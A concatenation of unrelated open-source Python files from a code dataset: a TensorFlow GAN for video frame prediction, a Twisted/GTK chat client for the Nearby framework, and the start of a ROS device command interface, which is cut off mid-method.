checkpoint_iterations = 100
best_model_iterations = 100
test_model_iterations = 5
best_loss = float("inf")
heigth, width = heigth_train, width_train
channels = 3
assert timesteps>=time_frames_to_consider and timesteps>=time_frames_to_predict, "time steps must be greater !"
#==================== COPIED CODE ===============================================
#
# TENSORBOARD VISUALIZATION FOR SHARPNESS AND (Peak Signal to Noise Ratio){PSNR}
#=================================================================================
def log10(t):
"""
Calculates the base-10 log of each element in t.
@param t: The tensor from which to calculate the base-10 log.
@return: A tensor with the base-10 log of each element in t.
"""
numerator = tf.log(t)
denominator = tf.log(tf.constant(10, dtype=numerator.dtype))
return numerator / denominator
def psnr_error(gen_frames, gt_frames):
"""
Computes the Peak Signal to Noise Ratio error between the generated images and the ground
truth images.
@param gen_frames: A tensor of shape [batch_size, height, width, 3]. The frames generated by the
generator model.
@param gt_frames: A tensor of shape [batch_size, height, width, 3]. The ground-truth frames for
each frame in gen_frames.
@return: A scalar tensor. The mean Peak Signal to Noise Ratio error over each frame in the
batch.
"""
shape = tf.shape(gen_frames)
num_pixels = tf.to_float(shape[1] * shape[2] * shape[3])
square_diff = tf.square(gt_frames - gen_frames)
batch_errors = 10 * log10(1 / ((1 / num_pixels) * tf.reduce_sum(square_diff, [1, 2, 3])))
return tf.reduce_mean(batch_errors)
def sharp_diff_error(gen_frames, gt_frames):
"""
Computes the Sharpness Difference error between the generated images and the ground truth
images.
@param gen_frames: A tensor of shape [batch_size, height, width, 3]. The frames generated by the
generator model.
@param gt_frames: A tensor of shape [batch_size, height, width, 3]. The ground-truth frames for
each frame in gen_frames.
@return: A scalar tensor. The Sharpness Difference error over each frame in the batch.
"""
shape = tf.shape(gen_frames)
num_pixels = tf.to_float(shape[1] * shape[2] * shape[3])
# gradient difference
# create filters [-1, 1] and [[1],[-1]] for diffing to the left and down respectively.
# TODO: Could this be simplified with one filter [[-1, 2], [0, -1]]?
pos = tf.constant(np.identity(3), dtype=tf.float32)
neg = -1 * pos
filter_x = tf.expand_dims(tf.stack([neg, pos]), 0) # [-1, 1]
filter_y = tf.stack([tf.expand_dims(pos, 0), tf.expand_dims(neg, 0)]) # [[1],[-1]]
strides = [1, 1, 1, 1] # stride of (1, 1)
padding = 'SAME'
gen_dx = tf.abs(tf.nn.conv2d(gen_frames, filter_x, strides, padding=padding))
gen_dy = tf.abs(tf.nn.conv2d(gen_frames, filter_y, strides, padding=padding))
gt_dx = tf.abs(tf.nn.conv2d(gt_frames, filter_x, strides, padding=padding))
gt_dy = tf.abs(tf.nn.conv2d(gt_frames, filter_y, strides, padding=padding))
gen_grad_sum = gen_dx + gen_dy
gt_grad_sum = gt_dx + gt_dy
grad_diff = tf.abs(gt_grad_sum - gen_grad_sum)
batch_errors = 10 * log10(1 / ((1 / num_pixels) * tf.reduce_sum(grad_diff, [1, 2, 3])))
return tf.reduce_mean(batch_errors)
## =================== COPIED CODE ENDS ======================
def l2_loss(generated_frames, expected_frames):
losses = []
for each_scale_gen_frames, each_scale_exp_frames in zip(generated_frames, expected_frames):
losses.append(tf.nn.l2_loss(tf.subtract(each_scale_gen_frames, each_scale_exp_frames)))
loss = tf.reduce_mean(tf.stack(losses))
return loss
def gdl_loss(generated_frames, expected_frames, alpha=2):
"""
difference with side pixel and below pixel
"""
scale_losses = []
for i in xrange(len(generated_frames)):
# create filters [-1, 1] and [[1],[-1]] for diffing to the left and down respectively.
pos = tf.constant(np.identity(3), dtype=tf.float32)
neg = -1 * pos
filter_x = tf.expand_dims(tf.stack([neg, pos]), 0) # [-1, 1]
filter_y = tf.stack([tf.expand_dims(pos, 0), tf.expand_dims(neg, 0)]) # [[1],[-1]]
strides = [1, 1, 1, 1] # stride of (1, 1)
padding = 'SAME'
gen_dx = tf.abs(tf.nn.conv2d(generated_frames[i], filter_x, strides, padding=padding))
gen_dy = tf.abs(tf.nn.conv2d(generated_frames[i], filter_y, strides, padding=padding))
gt_dx = tf.abs(tf.nn.conv2d(expected_frames[i], filter_x, strides, padding=padding))
gt_dy = tf.abs(tf.nn.conv2d(expected_frames[i], filter_y, strides, padding=padding))
grad_diff_x = tf.abs(gt_dx - gen_dx)
grad_diff_y = tf.abs(gt_dy - gen_dy)
scale_losses.append(tf.reduce_sum((grad_diff_x ** alpha + grad_diff_y ** alpha)))
# condense into one tensor and avg
return tf.reduce_mean(tf.stack(scale_losses))
def total_loss(generated_frames, expected_frames, loss_from_disc, lambda_gdl=1.0, lambda_l2=1.0, lambda_disc=1.0):
total_loss_cal = (lambda_gdl * gdl_loss(generated_frames, expected_frames) +
lambda_l2 * l2_loss(generated_frames, expected_frames)+
lambda_disc * loss_from_disc)
return total_loss_cal
#===================================================================
# Discriminator Model
#===================================================================
class ScaleBasedDiscriminator:
def __init__(self, heigth, width, kernel_size, feature_maps, fc_layer_units, scale_number):
assert len(feature_maps)==len(kernel_size), "Length should be equal !"
self.heigth = heigth
self.width = width
self.kernel_size = kernel_size
self.feature_maps = feature_maps
self.fc_layer_units = fc_layer_units
self.scale_number = scale_number
self.input = tf.placeholder(dtype=tf.float32, shape=[None, self.heigth, self.width, image_channels])
self.create_graph()
def create_graph(self):
predication = self.input
with tf.variable_scope('discriminator_scale_'+str(self.scale_number)):
conv_counter = 0
for index, (each_filter, each_kernel) in enumerate(zip(self.feature_maps, self.kernel_size)):
with tf.variable_scope('conv_'+str(conv_counter)):
conv_counter += 1
stride = 1
# last layer stride 2 ... fc layer weights reduce ...
if index == (len(self.feature_maps)-1):
stride = 2
predication = slim.conv2d(predication, each_filter, [each_kernel, each_kernel],
padding = 'VALID',
stride = stride,
weights_initializer=trunc_normal(0.01),
weights_regularizer=regularizers.l2_regularizer(l2_val))
# print predication
predication = slim.flatten(predication)
# print predication
fully_connected_counter = 0
for index, each_layer_units in enumerate(self.fc_layer_units):
with tf.variable_scope('fully_connected'+str(fully_connected_counter)):
fully_connected_counter += 1
activation = tf.nn.relu
# last layer sigmoid !
if index == (len(self.fc_layer_units)-1):
activation = tf.nn.sigmoid
predication = slim.fully_connected(predication, each_layer_units, activation_fn=activation)
# print predication
# clip value between 0.1 and 0.9
self.predication = tf.clip_by_value(predication, 0.1, 0.9)
class Discriminator:
def __init__(self, heigth, width, disc_scale_level_feature_maps, disc_scale_level_kernel_size, disc_fc_layer_units):
assert len(disc_scale_level_feature_maps)==len(disc_scale_level_kernel_size), "Length should be equal !"
assert len(disc_scale_level_feature_maps)==len(disc_fc_layer_units), "Length should be equal !"
self.heigth = heigth
self.width = width
self.disc_scale_level_feature_maps = disc_scale_level_feature_maps
self.disc_scale_level_kernel_size = disc_scale_level_kernel_size
self.disc_fc_layer_units = disc_fc_layer_units
# ground truth image
self.ground_truth_images = tf.placeholder(dtype=tf.float32, shape=[None, self.heigth, self.width, image_channels])
# real or fake
self.ground_truth_labels = tf.placeholder(dtype=tf.float32, shape=[None,1])
self.len_scale = len(self.disc_scale_level_kernel_size)
self.create_graph()
self.loss()
self.scale_images_ground_truth_for_inputs()
self.tf_summary()
def create_graph(self,):
self.scale_based_discriminators = []
for each_scale, (each_feature_map, each_kernel_size, each_fc_layer) in enumerate(zip(self.disc_scale_level_feature_maps, self.disc_scale_level_kernel_size, self.disc_fc_layer_units)):
# scaling create [1/64, 1/32, 1/16, 1/4]
scaling_factor = 1.0 / (2**(self.len_scale - 1 - each_scale))
rescaled_heigth = int(scaling_factor * self.heigth)
rescaled_width = int(scaling_factor * self.width)
disc_at_scale = ScaleBasedDiscriminator(heigth=rescaled_heigth,
width=rescaled_width, kernel_size=each_kernel_size,
feature_maps=each_feature_map,
fc_layer_units=each_fc_layer, scale_number=each_scale)
self.scale_based_discriminators.append(disc_at_scale)
self.scaled_disc_predication = []
for each_scaled_pred in self.scale_based_discriminators:
self.scaled_disc_predication.append(each_scaled_pred.predication)
# print self.scaled_disc_predication
def loss(self):
total_loss = []
for each_scaled_op in self.scaled_disc_predication:
# print each_scaled_op, self.ground_truth_labels
curr_loss = tf.losses.sigmoid_cross_entropy(multi_class_labels=self.ground_truth_labels, logits=each_scaled_op)
total_loss.append(curr_loss)
self.dis_loss = tf.reduce_mean(tf.stack(total_loss))
self.optimizer = tf.train.AdamOptimizer(adam_learning_rate)
global_step = tf.Variable(0,name="dis_global_step_var",trainable=False)
self.step = self.optimizer.minimize(self.dis_loss, global_step=global_step)
def rescale_image(self, scaling_factor, heigth, width, ground_truths):
"""
scaling_factor, heigth, width = values
input_data, ground_truths = Tensors
"""
rescaled_heigth = int(scaling_factor * heigth)
rescaled_width = int(scaling_factor * width)
assert rescaled_heigth != 0 and rescaled_width != 0, "scaling factor should not be zero !"
ground_truths_reshaped = tf.image.resize_images(ground_truths, [rescaled_heigth, rescaled_width])
return ground_truths_reshaped
def scale_images_ground_truth_for_inputs(self,):
inputs = []
for each_scale in range(self.len_scale):
scaling_factor = 1.0 / (2**(self.len_scale - 1 - each_scale))
inputs.append(self.rescale_image(scaling_factor, self.heigth, self.width, self.ground_truth_images))
self.rescaled_ground_truth_images = inputs
# print inputs
def tf_summary(self):
train_loss = tf.summary.scalar("dis_train_loss", self.dis_loss)
self.train_summary_merged = tf.summary.merge([train_loss])
#===================================================================
# Generative Model
#===================================================================
class GenerativeNetwork:
def __init__(self, heigth_train, width_train, heigth_test, width_test, scale_level_feature_maps, scale_level_kernel_size):
self.heigth_train = heigth_train
self.width_train = width_train
self.heigth_test = heigth_test
self.width_test = width_test
self.scale_level_feature_maps = scale_level_feature_maps
self.scale_level_kernel_size = scale_level_kernel_size
self.len_scale = len(self.scale_level_kernel_size)
assert len(self.scale_level_feature_maps) == len(self.scale_level_kernel_size), "Length should be equal !"
# Placeholders for inputs and outputs ... !
self.input_train = tf.placeholder(dtype=tf.float32, shape=[None, self.heigth_train, self.width_train, time_frames_to_consider * image_channels])
self.output_train = tf.placeholder(dtype=tf.float32, shape=[None, self.heigth_train, self.width_train, image_channels])
self.input_test = tf.placeholder(dtype=tf.float32, shape=[None, self.heigth_test, self.width_test, time_frames_to_consider * image_channels])
self.output_test = tf.placeholder(dtype=tf.float32, shape=[None, self.heigth_test, self.width_test, image_channels])
self.loss_from_disc = tf.placeholder(dtype=tf.float32, shape=[])
self.each_scale_predication_train = []
self.each_scale_ground_truth_train = []
self.each_scale_predication_test = []
self.each_scale_ground_truth_test = []
self.create_graph(self.input_train, self.output_train, heigth_train, width_train,
self.each_scale_predication_train,
self.each_scale_ground_truth_train,
reuse=None)
# reuse graph at time of test !
self.create_graph(self.input_test, self.output_test, heigth_test, width_test,
self.each_scale_predication_test,
self.each_scale_ground_truth_test,
reuse=True)
self.loss()
self.tf_summary()
# print self.each_scale_predication_train
# print self.each_scale_ground_truth_train
# print self.each_scale_predication_test
# print self.each_scale_ground_truth_test
def rescale_image(self, scaling_factor, heigth, width, input_data, ground_truths, last_generated_frame):
"""
scaling_factor, heigth, width = values
input_data, ground_truths = Tensors
"""
rescaled_heigth = int(scaling_factor * heigth)
rescaled_width = int(scaling_factor * width)
assert rescaled_heigth != 0 and rescaled_width != 0, "scaling factor should not be zero !"
input_reshaped = tf.image.resize_images(input_data, [rescaled_heigth, rescaled_width])
ground_truths_reshaped = tf.image.resize_images(ground_truths, [rescaled_heigth, rescaled_width])
last_generated_frame_reshaped = None
if last_generated_frame!=None:
last_generated_frame_reshaped = tf.image.resize_images(last_generated_frame, [rescaled_heigth, rescaled_width])
return (input_reshaped, ground_truths_reshaped, last_generated_frame_reshaped)
def create_graph(self, input_data, ground_truths, heigth, width,
predicated_at_each_scale_tensor, ground_truth_at_each_scale_tensor, reuse):
# for each scale ...
for each_scale in range(self.len_scale):
conv_counter = 0
with tf.variable_scope('scale_'+str(each_scale),reuse=reuse):
# scaling create [1/64, 1/32, 1/16, 1/4]
scaling_factor = 1.0 / (2**(self.len_scale - 1 - each_scale))
last_generated_frame = None
if each_scale > 0:
last_generated_frame = predicated_at_each_scale_tensor[each_scale-1]
input_reshaped, ground_truths_reshaped, last_generated_frame_reshaped = self.rescale_image(scaling_factor, heigth, width, input_data, ground_truths, last_generated_frame)
# append last scale output
if each_scale > 0:
input_reshaped = tf.concat([input_reshaped, last_generated_frame_reshaped],axis=3)
# print (input_reshaped, ground_truths_reshaped)
predication = input_reshaped
# for each conv layers in that scale ...
feature_maps = scale_level_feature_maps[each_scale]
kernel_size = scale_level_kernel_size[each_scale]
assert len(feature_maps)==len(kernel_size), "Length should be equal !"
for index, (each_filter, each_kernel) in enumerate(zip(feature_maps, kernel_size)):
with tf.variable_scope('conv_'+str(conv_counter),reuse=reuse):
conv_counter += 1
activiation = tf.nn.relu
# last layer tanh !
if index==(len(kernel_size)-1):
activiation = tf.nn.tanh
predication = slim.conv2d(predication, each_filter, [each_kernel, each_kernel],
weights_initializer=trunc_normal(0.01),
weights_regularizer=regularizers.l2_regularizer(l2_val),
activation_fn=activiation)
# APPEND LAST GENERATED FRAME
predicated_at_each_scale_tensor.append(predication)
ground_truth_at_each_scale_tensor.append(ground_truths_reshaped)
def loss(self):
# discriminator, gdl and l2 loss !
self.combined_loss = total_loss(self.each_scale_predication_train, self.each_scale_ground_truth_train, self.loss_from_disc)
self.optimizer = tf.train.AdamOptimizer(adam_learning_rate)
global_step = tf.Variable(0,name="global_step_var",trainable=False)
self.step = self.optimizer.minimize(self.combined_loss, global_step=global_step)
def tf_summary(self):
train_loss = tf.summary.scalar("gen_train_loss", self.combined_loss)
val_loss = tf.summary.scalar("gen_val_loss", self.combined_loss)
with tf.variable_scope('image_measures'):
psnr_error_train = psnr_error(self.each_scale_predication_train[-1], self.output_train)
psnr_error_train_s = tf.summary.scalar("train_psnr",psnr_error_train)
psnr_error_val_s = tf.summary.scalar("val_psnr",psnr_error_train)
sharpdiff_error_train = sharp_diff_error(self.each_scale_predication_train[-1],self.output_train)
sharpdiff_error_train_s = tf.summary.scalar("train_shardiff",sharpdiff_error_train)
sharpdiff_error_val_s = tf.summary.scalar("val_shardiff",sharpdiff_error_train)
images_to_show_train = []
images_to_show_val = []
len_pred = len(self.each_scale_predication_train)
for index_scale in range(len_pred-2,len_pred):
images_to_show_train.append(tf.summary.image('train_output_scale_' + str(index_scale), self.each_scale_predication_train[index_scale],
number_of_images_to_show))
images_to_show_train.append(tf.summary.image('train_ground_truth_scale_' + str(index_scale), self.each_scale_ground_truth_train[index_scale],
number_of_images_to_show))
images_to_show_val.append(tf.summary.image('val_output_scale_' + str(index_scale), self.each_scale_predication_train[index_scale],
number_of_images_to_show))
images_to_show_val.append(tf.summary.image('val_ground_truth_scale_' + str(index_scale), self.each_scale_ground_truth_train[index_scale],
number_of_images_to_show))
psnr_error_test = psnr_error(self.each_scale_predication_test[-1], self.output_test)
psnr_error_test_s = tf.summary.scalar("test_psnr",psnr_error_test)
sharpdiff_error_test = sharp_diff_error(self.each_scale_predication_test[-1],self.output_test)
sharpdiff_error_test_s = tf.summary.scalar("test_shardiff",sharpdiff_error_test)
images_to_show_test = []
len_pred = len(self.each_scale_predication_test)
for index_scale in range(len_pred-2,len_pred):
images_to_show_test.append(tf.summary.image('test_output_scale_' + str(index_scale), self.each_scale_predication_test[index_scale],
number_of_images_to_show))
images_to_show_test.append(tf.summary.image('test_ground_truth_scale_' + str(index_scale), self.each_scale_ground_truth_test[index_scale],
number_of_images_to_show))
self.train_summary_merged = tf.summary.merge([train_loss, psnr_error_train_s, sharpdiff_error_train_s]+images_to_show_train)
self.test_summary_merged = tf.summary.merge([psnr_error_test_s, sharpdiff_error_test_s]+images_to_show_test)
self.val_summary_merged = tf.summary.merge([val_loss, psnr_error_val_s, sharpdiff_error_val_s]+images_to_show_val)
# ======================== MODEL ENDS ========================
def log_directory_creation(sess):
if tf.gfile.Exists(log_dir_file_path):
tf.gfile.DeleteRecursively(log_dir_file_path)
tf.gfile.MakeDirs(log_dir_file_path)
# model save directory
if os.path.exists(model_save_file_path):
x_folder = iterations
print ("loading model from ",x_folder)
restore_model_session(sess, x_folder + "gan_model")
else:
os.makedirs(model_save_file_path + iterations)
os.makedirs(model_save_file_path + best)
# output dir creation
if not os.path.exists(output_video_save_file_path):
os.makedirs(output_video_save_file_path)
def save_model_session(sess, file_name):
saver = tf.train.Saver()
save_path = saver.save(sess, model_save_file_path + file_name)
def restore_model_session(sess, file_name):
saver = tf.train.Saver() # tf.train.import_meta_graph(model_save_file_path + file_name + ".meta")
saver.restore(sess, model_save_file_path + file_name)
print ("graph loaded!")
def is_correct_batch_shape(X_batch, y_batch, info="train",heigth=heigth, width=width):
# info can be {"train", "val"}
if (X_batch is None or y_batch is None or
X_batch.shape[1:] != (timesteps, heigth, width, channels) or
y_batch.shape[1:] != (timesteps, heigth, width, channels)):
print ("Warning: skipping this " + info + " batch because of shape")
return False
return True
def images_to_channels(X_batch):
"""
This utility convert (Batch Size, TimeSteps, H, W, C) => (Batch Size, H, W, C, TimeSteps) => (Batch Size, H, W, C * TimeSteps)
Refer Input of Mutli Scale Architecture !
"""
input_data = X_batch.transpose(0,2,3,4,1)
input_data = input_data.reshape(list(input_data.shape[:-2])+[-1])
return input_data
def remove_oldest_image_add_new_image(X_batch,y_batch):
"""
While frame predications each time step remove oldest image and newest image
"""
removed_older_image = X_batch[:,:,:,channels:]
new_batch = np.append(removed_older_image, y_batch, axis=3)
return new_batch
def alternate_disc_gen_training(sess, disc_model, gen_model, input_train, output_train):
# get scaled input on ground truth image !
rescaled_ground_truth_images = sess.run(disc_model.rescaled_ground_truth_images, feed_dict={disc_model.ground_truth_images: output_train})
new_feed_dict = {}
for i in range(len(rescaled_ground_truth_images)):
new_feed_dict [ disc_model.scale_based_discriminators[i].input ] = rescaled_ground_truth_images[i]
# real images !
new_feed_dict[disc_model.ground_truth_labels] = np.ones([len(input_train),1])
# disc train on real data
_, disc_summary_real = sess.run([disc_model.step, disc_model.train_summary_merged] ,feed_dict=new_feed_dict)
# gen predict on real data => predicated
each_scale_predication_train = sess.run(gen_model.each_scale_predication_train, feed_dict={gen_model.input_train : input_train, gen_model.output_train : output_train})
new_feed_dict = {}
for i in range(len(each_scale_predication_train)):
new_feed_dict [ disc_model.scale_based_discriminators[i].input ] = each_scale_predication_train[i]
# fake images !
new_feed_dict[disc_model.ground_truth_labels] = np.zeros([len(input_train),1])
# disc train on predicated by gen
_, disc_summary_fake, dis_loss = sess.run([disc_model.step, disc_model.train_summary_merged, disc_model.dis_loss] ,feed_dict=new_feed_dict)
# gen take loss from disc and train
_, gen_summary = sess.run([gen_model.step, gen_model.train_summary_merged], feed_dict={gen_model.loss_from_disc : dis_loss,
gen_model.input_train : input_train,
gen_model.output_train : output_train
})
return (disc_summary_real, disc_summary_fake, gen_summary)
def validation(sess, gen_model, data, val_writer, val_step):
loss = []
for X_batch, y_batch, _ in data.val_next_batch():
if not is_correct_batch_shape(X_batch, y_batch, "val"):
print ("validation batch is skipping ... ")
continue
X_input = X_batch[:,:time_frames_to_consider]
X_input = images_to_channels(X_input)
# ground truth ... for loss calculation ... !
output_train = X_batch[:,time_frames_to_consider,:,:,:]
Y_output = np.zeros((len(X_input),time_frames_to_predict,heigth,width,channels))
for each_time_step in range(time_frames_to_predict):
# gen predict on real data => predicated
y_current_step, combined_loss, train_summary_merged = sess.run([gen_model.each_scale_predication_train[-1], gen_model.combined_loss,gen_model.val_summary_merged], feed_dict={gen_model.loss_from_disc : 0.0,
gen_model.input_train : X_input,
gen_model.output_train : output_train})
loss.append(combined_loss)
val_writer.add_summary(train_summary_merged, val_step)
val_step += 1
Y_output[:,each_time_step,:,:,:] = y_current_step
X_input = remove_oldest_image_add_new_image(X_input,y_current_step)
output_train = X_batch[:,time_frames_to_predict+each_time_step+1,:,:,:]
if len(loss)==0:
return (val_step, float("inf"))
return (val_step, sum(loss)/float(len(loss)))
def test(sess, gen_model, data, test_writer, test_step, is_store_output=False):
for X_batch, y_batch, file_names in data.get_custom_test_data():
if not is_correct_batch_shape(X_batch, y_batch, "test",heigth=custom_test_size[0], width=custom_test_size[1]):
print ("test batch is skipping ... ")
continue
X_input = X_batch[:,:time_frames_to_consider]
X_input = images_to_channels(X_input)
# ground truth ... for loss calculation ... !
output_train = X_batch[:,time_frames_to_consider,:,:,:]
# store output ...
Y_output = np.zeros((len(X_batch),time_frames_to_predict,custom_test_size[0],custom_test_size[1],channels))
for each_time_step in range(time_frames_to_predict):
# gen predict on real data => predicated
y_current_step, test_summary_merged = sess.run([gen_model.each_scale_predication_test[-1], gen_model.test_summary_merged], feed_dict={gen_model.loss_from_disc : 0.0,
gen_model.input_test : X_input,
gen_model.output_test : output_train})
test_writer.add_summary(test_summary_merged, test_step)
test_step += 1
Y_output[:,each_time_step,:,:,:] = y_current_step
X_input = remove_oldest_image_add_new_image(X_input,y_current_step)
output_train = X_batch[:,time_frames_to_predict+each_time_step+1,:,:,:]
if is_store_output:
# save with filnames
expected_frames = X_batch[:,time_frames_to_consider:time_frames_to_consider+time_frames_to_predict,:,:,:]
# image post processing is happening inside of store ...
# store
store_file_names_gen = data.frame_ext.generate_output_video(Y_output, file_names, ext_add_to_file_name="_generated_large")
store_file_names_exp = data.frame_ext.generate_output_video(expected_frames, file_names, ext_add_to_file_name="_expected_large")
speed = 1
data.frame_ext.generate_gif_videos(store_file_names_gen,speed=speed)
data.frame_ext.generate_gif_videos(store_file_names_exp,speed=speed)
return test_step
def test_wrapper():
with tf.Session() as sess:
disc_model = Discriminator(heigth, width, disc_scale_level_feature_maps, disc_scale_level_kernel_size, disc_fc_layer_units)
gen_model = GenerativeNetwork(heigth_train, width_train, heigth_test, width_test, scale_level_feature_maps, scale_level_kernel_size)
# Initialize the variables (i.e. assign their default value)
init = tf.global_variables_initializer()
sess.run(init)
# clear logs !
log_directory_creation(sess)
# summary !
gen_train_writer = tf.summary.FileWriter(log_dir_file_path + "gen_train", sess.graph)
des_train_writer = tf.summary.FileWriter(log_dir_file_path + "des_train", sess.graph)
test_writer = tf.summary.FileWriter(log_dir_file_path + "test", sess.graph)
val_writer = tf.summary.FileWriter(log_dir_file_path + "val", sess.graph)
global_step = 0
gen_count_iter = 0
des_count_iter = 0
val_count_iter = 0
test_count_iter = 0
val_loss_seen = float("inf")
# data read iterator
data = datasets(batch_size=batch_size, height=heigth, width=width,
custom_test_size=custom_test_size,time_frame=timesteps, interval=interval)
test_count_iter = test(sess, gen_model, data, test_writer, test_count_iter, is_store_output=True)
def train():
global best_loss
with tf.Session() as sess:
disc_model = Discriminator(heigth, width, disc_scale_level_feature_maps, disc_scale_level_kernel_size, disc_fc_layer_units)
gen_model = GenerativeNetwork(heigth_train, width_train, heigth_test, width_test, scale_level_feature_maps, scale_level_kernel_size)
# Initialize the variables (i.e. assign their default value)
init = tf.global_variables_initializer()
sess.run(init)
# clear logs !
log_directory_creation(sess)
# summary !
gen_train_writer = tf.summary.FileWriter(log_dir_file_path + "gen_train", sess.graph)
des_train_writer = tf.summary.FileWriter(log_dir_file_path + "des_train", sess.graph)
test_writer = tf.summary.FileWriter(log_dir_file_path + "test", sess.graph)
val_writer = tf.summary.FileWriter(log_dir_file_path + "val", sess.graph)
global_step = 0
gen_count_iter = 0
des_count_iter = 0
val_count_iter = 0
test_count_iter = 0
val_loss_seen = float("inf")
while True:
try:
# data read iterator
data = datasets(batch_size=batch_size, height=heigth, width=width,
custom_test_size=custom_test_size,time_frame=timesteps, interval=interval)
for X_batch, y_batch, _ in data.train_next_batch():
# print ("X_batch", X_batch.shape, "y_batch", y_batch.shape)
if not is_correct_batch_shape(X_batch, y_batch, "train"):
# global step not increased !
continue
for each_timesteps in range(time_frames_to_consider, timesteps-time_frames_to_consider):
input_train = X_batch[:, each_timesteps-time_frames_to_consider:each_timesteps, :,:,:]
input_train = images_to_channels(input_train)
output_train = X_batch[:,each_timesteps,:,:,:]
disc_summary_real, disc_summary_fake, gen_summary = alternate_disc_gen_training(sess, disc_model, gen_model, input_train, output_train)
gen_train_writer.add_summary(gen_summary, gen_count_iter)
gen_count_iter += 1
des_train_writer.add_summary(disc_summary_real, des_count_iter)
des_count_iter += 1
des_train_writer.add_summary(disc_summary_fake, des_count_iter)
des_count_iter += 1
if global_step % checkpoint_iterations == 0:
save_model_session(sess, iterations + "gan_model")
if global_step % best_model_iterations == 0:
val_count_iter, curr_loss = validation(sess, gen_model, data, val_writer, val_count_iter)
if curr_loss < val_loss_seen:
val_loss_seen = curr_loss
save_model_session(sess, best + "gan_model")
if global_step % test_model_iterations == 0:
test_count_iter = test(sess, gen_model, data, test_writer, test_count_iter)
print ("Iteration ", global_step, " best_loss ", val_loss_seen)
global_step += 1
except:
print ("error occur ... skipping ... !")
train_writer.close()
test_writer.close()
def main():
train()
if __name__ == '__main__':
main()
| apache-2.0 | 2,724,290,950,432,805,400 | 49.824234 | 217 | 0.579255 | false |
mcolyer/nearby | plugins/chat-0.1/main.py | 1 | 3343 | #!/usr/bin/env python
"""
Nearby - A general message passing framework.
Copyright (C) 2005 Matthew Colyer <[email protected]>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
from twisted.internet import gtk2reactor
gtk2reactor.install()
import gtk
import pango
from SimpleGladeApp import SimpleGladeApp
from twisted.internet.protocol import ClientFactory
from twisted.protocols.basic import LineReceiver
from twisted.internet import reactor
import re
class NearbyChat(SimpleGladeApp, LineReceiver):
def __init__(self, *args):
self.buffer = gtk.TextBuffer()
#Highlighted username tag
self.buffer.create_tag("user", weight=pango.WEIGHT_BOLD, foreground="blue")
SimpleGladeApp.__init__(self, "chat.glade")
self.received_text.set_buffer(self.buffer)
def connectionMade(self):
self.sendLine("REGISTER chat 0.1")
def lineReceived(self, line):
print "DEBUG:", line
receiveRe = re.compile("^RECEIVE (\S+) (\S+) (.*)$")
if not receiveRe.match(line):
#If we are passed a garbage message fail silently
return
nodeid, username, message = receiveRe.match(line).groups(1)
self.buffer.insert_with_tags_by_name(self.buffer.get_end_iter(), "%s: " % username, "user")
self.buffer.insert_at_cursor("%s\n" % message)
def new(self):
pass
def on_file_save(self, widget, data=None):
pass
def on_file_open(self, widget, data=None):
filter = gtk.FileFilter()
filter.add_pattern("*.txt")
self.dialog_file_open.set_filter(filter)
self.dialog_file_open.show()
def on_file_open_response(self, widget, response, data=None):
self.dialog_file_open.hide()
if (response == gtk.RESPONSE_OK):
pass
def on_text_entry_key_release(self, widget, event):
if gtk.gdk.keyval_name(event.keyval) == "Return":
print "SEND "+self.text_entry.get_text()
self.sendLine("SEND "+self.text_entry.get_text())
def on_quit(self, widget):
self.transport.loseConnection()
class NearbyClientFactory(ClientFactory):
protocol = NearbyChat
def startedConnecting(self, connector):
print "connecting"
def clientConnectionFailed(self, connector, reason):
print 'connection failed:', reason.getErrorMessage()
reactor.stop()
def clientConnectionLost(self, connector, reason):
print 'connection lost:', reason.getErrorMessage()
reactor.stop()
def main():
factory = NearbyClientFactory()
reactor.connectTCP('localhost', 8002, factory)
reactor.run()
if __name__ == "__main__":
main()
#vim: set ts=4 sw=4 expandtab :
| gpl-2.0 | 4,740,466,048,686,461,000 | 31.77451 | 99 | 0.685313 | false |
RobotnikAutomation/robotnik_trajectory_control | src/robotnik_trajectory_control/interfaces/device_command_interface.py | 1 | 5944 | #!/usr/bin/env python
import rospy
from threading import Thread
from sensor_msgs.msg import JointState
from rospy.exceptions import ROSException
from robotnik_msgs.msg import State
from std_srvs.srv import Empty
import time
#
# STANDARD INTERFACE
#
class DeviceCommandInterface():
'''
Class intended to communicate with controller devices by using a standard interface
'''
def __init__(self, args):
'''
Component initialization
@param args: arguments to configure the component
@type args: {name: string, command_topic: string, state_topic: string, joints: [string]}
'''
self.initialized = False
if args.has_key('type'):
self.type = args['type']
else:
self.type = 'DeviceCommandInterface'
if args.has_key('name'):
self.name = args['name']
else:
self.name = 'unnamed'
rospy.logerr('%s:init: param name not found'%self.type)
if args.has_key('command_topic'):
self.command_topic = args['command_topic']
else:
self.command_topic = ''
rospy.logerr('%s:init: param command_topic not found'%self.type)
if args.has_key('state_topic'):
self.state_topic = args['state_topic']
print 'state topic = %s'%(self.state_topic)
else:
self.state_topic = ''
rospy.logerr('%s:init: param state_topic not found'%self.type)
if args.has_key('joints'):
self.joint_names = args['joints']
else:
self.joint_names = []
rospy.logerr('%s:init: param joints not found'%self.type)
self.joint_state = JointState()
# Intermediate structure to save each pos, vel and effort value before sending the command to the component
# Ej.: {'j1': [ 0, 0, 0 ]}
self.joint_state_pointer = {}
# State of the component
self.state = State.READY_STATE
def setup(self):
'''
Initializes joint values, connect to command and state topics
@return: 0 if OK, -1 otherwise
'''
if len(self.joint_names) == 0:
rospy.logerr('%s-%s:setup: no joints provided'%(self.type, self.name))
return -1
else:
for i in range(len(self.joint_names)):
self.joint_state.name.append(self.joint_names[i])
self.joint_state.position.append(0)
self.joint_state.velocity.append(0)
self.joint_state.effort.append(0)
#
self.joint_state_pointer[self.joint_names[i]] = [ 0, 0, 0]
'''
# TODO for each component
if len(self.state_topic) > 0:
try:
self.state_subscriber = rospy.Subscriber(self.state_topic, String, self.receiveStateCb)
except ValueError, e:
rospy.logerr('%s-%s:setup: Error connecting to topic %s ->(%s)'%(self.type, self.name, self.state_topic, e))
'''
if len(self.command_topic) > 0:
try:
self.command_publisher = rospy.Publisher(self.command_topic, JointState, queue_size=1)
rospy.loginfo('%s-%s:setup: connecting to topic %s'%(self.type, self.name, self.command_topic))
except ValueError, e:
